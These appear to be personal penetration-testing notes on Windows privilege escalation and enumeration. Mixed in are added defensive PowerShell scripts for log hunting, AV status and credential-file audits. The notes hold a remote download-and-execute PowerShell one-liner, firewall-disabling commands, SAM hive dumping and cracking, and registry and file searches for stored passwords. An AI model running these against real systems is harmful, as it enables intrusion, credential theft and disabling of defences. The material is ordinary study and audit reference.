Windows
Monday, August 17, 2020
3:12 PM Backlink: reference-notes-readme
Enumeration Guides
Windows Privilege Escalation Guide
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows elevation of privileges
OSCP-note/Windows_commands at master · R0B1NL1N/OSCP-note · GitHub
Local AD Abuse
Retrieve Deleted Items
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties *
Remote Script Execution
Use the following to source and execute a file from a remote HTTP server on the local Windows machine:
$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("http://...")
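The one-liner above is a classic download-and-execute pattern, and it is also one of the easiest things to spot on a host that has PowerShell Script Block Logging turned on (policy key HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, EnableScriptBlockLogging=1). The following is an added example, not part of the original notes, that hunts the last seven days of Event ID 4104 records for the WebClient/IEX pattern; the regex list and the seven-day window are my choices:

```powershell
# Added example (not from the original notes): search PowerShell script block logs
# (Event ID 4104, needs Script Block Logging enabled) for the
# download-and-execute pattern shown above. Run from an elevated prompt.
$patterns = 'Net\.WebClient', 'DownloadString', 'IEX\s*\(', 'Invoke-Expression'
$regex = $patterns -join '|'

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddDays(-7)   # assumed look-back window
} -ErrorAction SilentlyContinue

$hits = foreach ($e in $events) {
    # For 4104 the event properties are MessageNumber, MessageTotal,
    # ScriptBlockText, ScriptBlockId, Path; index 2 is the script text.
    $script = [string]$e.Properties[2].Value
    if ($script -match $regex) {
        $flat = $script -replace '\s+', ' '
        [pscustomobject]@{
            Time      = $e.TimeCreated
            ProcessId = $e.ProcessId
            UserId    = $e.UserId
            Snippet   = $flat.Substring(0, [Math]::Min(120, $flat.Length))
        }
    }
}
$hits | Sort-Object Time | Format-Table -AutoSize
```

Script blocks are logged after any string decoding the engine performs, so an obfuscated or base64-wrapped loader still shows up as the decoded command text; matching on `DownloadString` and `Net.WebClient` therefore catches the decoded form, not just the literal one-liner.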
Privesc Enum Scripts
Sherlock - Run with "Find-AllVulns" to check for MSxxxxx style kernel exploit vulnerabilities.
PowerUp.ps1 - Run with "Invoke-AllChecks" to check for various exploit vulnerabilities, similar to Linux Smart Enumeration etc.
systeminfo - Get full systeminfo to feed into WinPrivescChecker.
Windows Privesc Commands
AV Enumeration
List AV products in PowerShell:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
To list AV products using WMIC in a CMD prompt:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
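Both commands above list product names only. The productState field carries the interesting part (is real-time protection on, are signatures current), as a packed integer. The following is an added example, not part of the original notes, that decodes it using the community-documented hex layout (digits 3-4 = real-time protection state, digits 5-6 = signature state); Microsoft does not formally document this field, so treat the layout as an assumption and sanity-check it against one known product:

```powershell
# Added example (not from the original notes): query SecurityCenter2 and decode
# productState so the output shows whether each product is enabled and up to date.
# Layout assumed (commonly documented, not official): 6 hex digits, chars 2-3 are
# real-time protection ("10"/"11" = on), chars 4-5 are signature status ("00" = current).
function Get-AvStatus {
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct |
        ForEach-Object {
            $hex = '{0:X6}' -f [int]$_.productState
            [pscustomobject]@{
                Product   = $_.displayName
                StateHex  = $hex
                Enabled   = $hex.Substring(2, 2) -in '10', '11'
                UpToDate  = $hex.Substring(4, 2) -eq '00'
                ExePath   = $_.pathToSignedProductExe
                Timestamp = $_.timestamp
            }
        }
}

Get-AvStatus | Format-Table -AutoSize
```

The root/SecurityCenter2 namespace exists only on client SKUs; on Windows Server the query returns nothing and you have to ask the product directly (for Defender, Get-MpComputerStatus).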
Windows System Information
Get Windows Version and Configuration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Extract patches and updates
wmic qfe
Get Architecture
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
set
Get-ChildItem Env: | ft Key,Value
List all drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
User/Group Information
Check user privileges
whoami /priv
Multiple Methods to list all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements, helpful for brute-forcing.
net accounts
Get details about user
net user <username>
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Network Enum
List all interfaces, IP info, DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List ARP table
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Get current connections
netstat -ano
List firewall info
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List ports blocked by firewall.
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
View SNMP configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
EoP Enum
SAM/SYSTEM Files
The Security Account Manager (SAM), often called the Security Accounts Manager, is a database file. User passwords are stored in it as hashes in a registry hive, either as LM hashes or as NTLM hashes. The file lives at %SystemRoot%\System32\config\SAM and is mounted at HKLM\SAM.
%SYSTEMROOT% = C:\Windows # Usually
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
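The live hives under System32\config are locked by the kernel, so the copies in repair\ and RegBack\ are the ones that matter when checking a host for exposure. The following is an added example, not part of the original notes, that reports which of the paths above exist, how large they are (RegBack copies are 0 bytes on current Windows 10/11 builds because scheduled registry backup is off by default), and whether any principal other than SYSTEM and Administrators has read access; the "trusted" list is my assumption:

```powershell
# Added example (not from the original notes): check whether the SAM/SYSTEM hive
# copies listed above exist and who, apart from SYSTEM/Administrators, can read them.
# Run from an elevated prompt.
$paths = @(
    "$env:SystemRoot\repair\SAM",
    "$env:SystemRoot\repair\system",
    "$env:SystemRoot\System32\config\SAM",
    "$env:SystemRoot\System32\config\SYSTEM",
    "$env:SystemRoot\System32\config\RegBack\SAM",
    "$env:SystemRoot\System32\config\RegBack\system"
)
# Assumed set of principals that are expected to hold read access.
$trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators'
$readBit = [System.Security.AccessControl.FileSystemRights]::ReadData

foreach ($p in $paths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    $item = Get-Item -LiteralPath $p -Force
    $acl  = Get-Acl -LiteralPath $p
    $extra = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -notin $trusted -and
        (($_.FileSystemRights -band $readBit) -ne 0)
    }
    [pscustomobject]@{
        Path         = $p
        SizeBytes    = $item.Length
        LastWrite    = $item.LastWriteTime
        ExtraReaders = ($extra.IdentityReference.Value | Select-Object -Unique) -join ', '
    }
}
```

A non-empty ExtraReaders column on any of these files (or on a Volume Shadow Copy of them) is the condition that makes the offline pwdump/samdump2 path below possible without already being an administrator.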
Generate a hash file for John using pwdump or samdump2.
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
Then crack it with john --format=NT /root/sam.txt.
Search for files contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for file with specific filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Read a value of a certain sub key
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
Passwords can sometimes be found in Unattend.xml, stored base64-encoded (encoded, not encrypted):
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Locate these files with
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
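The dir command above only finds the files. The following is an added example, not part of the original notes, that parses the XML answer files from the list above and reports each password element left behind by setup, whether it still has a value, and whether that value is plain text or the base64 form; it never prints the value itself, which is all an audit needs before the file is deleted or scrubbed. sysprep.inf is an INI file rather than XML and is left out; the path list is taken from the notes:

```powershell
# Added example (not from the original notes): audit the XML answer-file locations
# listed above for password elements, without printing the values.
# Run from an elevated prompt; answer files should be removed after deployment.
$candidates = @(
    "$env:SystemDrive\unattend.xml",
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",
    "$env:SystemRoot\System32\sysprep\sysprep.xml"
)

foreach ($f in $candidates) {
    if (-not (Test-Path -LiteralPath $f)) { continue }
    try   { [xml]$doc = Get-Content -LiteralPath $f -Raw -ErrorAction Stop }
    catch { Write-Warning "Cannot parse ${f}: $_"; continue }

    # Unattend files use a default namespace, so match on local-name().
    # Password elements carry <Value> and <PlainText>; PlainText=false means
    # the value is base64 (an encoding, not encryption).
    $nodes = $doc.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')
    foreach ($node in $nodes) {
        $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
        $plainNode = $node.SelectSingleNode('*[local-name()="PlainText"]')
        $plainText = if ($null -ne $plainNode) { $plainNode.InnerText.Trim() } else { 'n/a' }
        [pscustomobject]@{
            File      = $f
            Element   = $node.ParentNode.LocalName + '/' + $node.LocalName
            HasValue  = ($null -ne $valueNode -and $valueNode.InnerText.Trim() -ne '')
            PlainText = $plainText
        }
    }
}
```

Any row with HasValue = True is a finding regardless of the PlainText column: the base64 form in these files is reversible and offers no protection once the file is readable.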
Helpful Bash-like commands
ipconfig == ifconfig == ip a
ipconfig /displaydns
tasklist == ps aux
netstat -na